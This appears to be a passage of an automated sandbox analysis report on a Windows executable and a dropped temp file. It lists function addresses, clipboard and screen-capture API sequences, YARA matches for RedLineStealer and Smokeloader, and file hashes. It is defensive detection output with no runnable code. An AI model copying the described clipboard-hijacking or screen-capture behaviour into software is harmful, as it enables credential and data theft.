                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024C1942
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024C2361
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024C2605
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004280220_2_00428022
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004071AB0_2_004071AB
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004373D90_2_004373D9
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004274840_2_00427484
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004285600_2_00428560
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0043D6780_2_0043D678
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004166AF0_2_004166AF
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004137250_2_00413725
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004277F60_2_004277F6
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0040E9740_2_0040E974
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0042EAE00_2_0042EAE0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00427AA00_2_00427AA0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00418AAF0_2_00418AAF
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00436CBF0_2_00436CBF
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00427D670_2_00427D67
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00413F0B0_2_00413F0B
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E82890_2_024E8289
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024EED470_2_024EED47
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D41720_2_024D4172
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E76EB0_2_024E76EB
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024ED7550_2_024ED755
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E87C70_2_024E87C7
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E7A5D0_2_024E7A5D
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024CEBDB0_2_024CEBDB
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D69160_2_024D6916
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D398C0_2_024D398C
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F6F260_2_024F6F26
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E7FCE0_2_024E7FCE
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024EED470_2_024EED47
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024E7D070_2_024E7D07
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D8D160_2_024D8D16
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0040B44C3_2_0040B44C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004087903_2_00408790
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004260543_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043B0683_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004140703_2_00414070
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043C0203_2_0043C020
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004398303_2_00439830
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043D8303_2_0043D830
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041B0E13_2_0041B0E1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041F0E03_2_0041F0E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004210E03_2_004210E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004358903_2_00435890
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004340983_2_00434098
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043D0A03_2_0043D0A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004180A93_2_004180A9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0040A9403_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041714B3_2_0041714B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0040C9173_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042B12C3_2_0042B12C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042F1303_2_0042F130
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042B1C03_2_0042B1C0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041D9E03_2_0041D9E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004361E03_2_004361E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004111E53_2_004111E5
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004059F03_2_004059F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004239F23_2_004239F2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043C1F03_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004259903_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043B9A13_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004062503_2_00406250
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041D2703_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00424A743_2_00424A74
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004092303_2_00409230
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00423A343_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004152983_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004143C23_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004373993_2_00437399
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004393A03_2_004393A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004223B83_2_004223B8
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00436C003_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004234103_2_00423410
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004074B03_2_004074B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004185783_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004245023_2_00424502
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00421D103_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004175823_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004205B03_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00426E503_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004356303_2_00435630
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004066E03_2_004066E0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004256F93_2_004256F9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00422E933_2_00422E93
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00425E903_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004156A03_2_004156A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00415F663_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004197703_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004097003_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A32073_2_024A3207
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DB2CF3_2_024DB2CF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D42FF3_2_024D42FF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B734A3_2_024B734A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BB3483_2_024BB348
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C13473_2_024C1347
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BF3473_2_024BF347
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DD3073_2_024DD307
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A83C73_2_024A83C7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CF3973_2_024CF397
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CB3933_2_024CB393
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B73B23_2_024B73B2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C80093_2_024C8009
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024AC0E83_2_024AC0E8
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D11573_2_024D1157
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C81083_2_024C8108
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D91073_2_024D9107
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D61073_2_024D6107
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A61173_2_024A6117
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BE1E73_2_024BE1E7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BC1AC3_2_024BC1AC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D96073_2_024D9607
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C96113_2_024C9611
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CB7633_2_024CB763
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A77173_2_024A7717
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B87DF3_2_024B87DF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CD7E53_2_024CD7E5
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DD7E73_2_024DD7E7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B144C3_2_024B144C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D64473_2_024D6447
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CB4273_2_024CB427
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BD4D73_2_024BD4D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A94973_2_024A9497
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A64B73_2_024A64B7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B95413_2_024B9541
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DD5573_2_024DD557
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BC5283_2_024BC528
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A45D73_2_024A45D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D5AF73_2_024D5AF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D9A973_2_024D9A97
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DDA973_2_024DDA97
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024ACB7E3_2_024ACB7E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C5BF73_2_024C5BF7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B7BA73_2_024B7BA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024AABA73_2_024AABA7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BD8473_2_024BD847
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CB75E3_2_024CB75E
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C08173_2_024C0817
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D58973_2_024D5897
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D48913_2_024D4891
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CC8B13_2_024CC8B1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CC94B3_2_024CC94B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A69473_2_024A6947
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A99673_2_024A9967
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BC9213_2_024BC921
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B99D73_2_024B99D7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A89F73_2_024A89F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CC98D3_2_024CC98D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024CC99C3_2_024CC99C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024D6E673_2_024D6E67
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A2E373_2_024A2E37
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C1F773_2_024C1F77
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A4F173_2_024A4F17
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024B8F353_2_024B8F35
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024ADF8C3_2_024ADF8C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BDFB73_2_024BDFB7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BDC473_2_024BDC47
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A5C573_2_024A5C57
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024AFC643_2_024AFC64
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DBC083_2_024DBC08
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A3C273_2_024A3C27
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C4CF43_2_024C4CF4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024C3C9B3_2_024C3C9B
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: String function: 024A81D7 appears 78 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: String function: 024B42C7 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: String function: 00414060 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: String function: 00407F70 appears 46 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: String function: 024D0987 appears 53 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: String function: 00410720 appears 53 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: String function: 0040F903 appears 36 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: String function: 024D0019 appears 121 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: String function: 0040FDB2 appears 125 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
                Source: AZCFTWko2q.exeBinary or memory string: OriginalFileName vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000003.1461824570.0000000002530000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: AZCFTWko2q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 86DC.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/5
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A39FDE CreateToolhelp32Snapshot,Module32First,0_2_00A39FDE
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_004361E0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
